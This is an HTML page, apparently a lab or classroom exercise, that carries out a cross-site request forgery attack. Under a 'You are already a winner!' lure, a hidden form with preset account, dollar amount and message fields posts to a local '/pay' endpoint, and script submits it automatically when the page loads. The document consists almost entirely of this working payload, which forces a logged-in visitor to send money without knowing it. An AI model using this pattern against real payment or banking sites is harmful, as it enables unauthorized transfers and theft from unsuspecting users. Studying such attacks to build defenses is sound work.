<html>
  <head>
    <title>Win Big!</title>
  </head>
  <body>
    <p>You are <b>already</b> a winner!</p>
    <form id="secret_form" method="post" action="http://localhost:5000/pay">
      <input type="hidden" name="account" value="sam">
      <input type="hidden" name="dollars" value="330">
      <input type="hidden" name="message" value="Someone else won big">
      <button type="submit">Win Big</button>
    </form>
    <script>
      document.getElementById("secret_form").submit();
    </script>
  </body>
</html>
